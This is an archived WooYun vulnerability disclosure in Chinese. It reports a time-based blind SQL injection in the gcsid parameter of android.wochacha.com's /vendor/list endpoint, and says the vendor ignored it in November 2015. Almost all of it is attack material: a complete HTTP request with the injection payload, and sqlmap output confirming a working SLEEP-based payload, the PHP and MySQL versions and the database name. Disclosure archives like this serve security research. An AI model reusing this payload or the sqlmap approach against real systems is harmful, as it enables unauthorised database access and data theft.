乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-23: 细节已通知厂商并且等待厂商处理中 2015-11-28: 厂商已经主动忽略漏洞,细节向公众公开
GET /vendor/list?gcsid=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/&type=2&vsid=2039367 HTTP/1.1X-Requested-With: XMLHttpRequestReferer: http://android.wochacha.com:80/Cookie: GCSID=e78f4fe840fb4d74340fcd378de0f2eb; __utmmobile=0x4201520cd963ca29Host: android.wochacha.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21Accept: */*
sqlmap resumed the following injection point(s) from stored session:---Parameter: #1* (URI) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: http://android.wochacha.com:80/vendor/list?gcsid=if(now()=sysdate(),sleep(0),0)/' AND (SELECT * FROM (SELECT(SLEEP(5)))sYWl) AND 'hxEi'='hxEi'XOR(if(now()=sysdate(),sleep(0),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"/&type=2&vsid=2039367---web application technology: PHP 5.3.6back-end DBMS: MySQL 5.0.12current database: 'security'
危害等级:无影响厂商忽略
忽略时间:2015-11-28 15:08
漏洞Rank:4 (WooYun评价)
暂无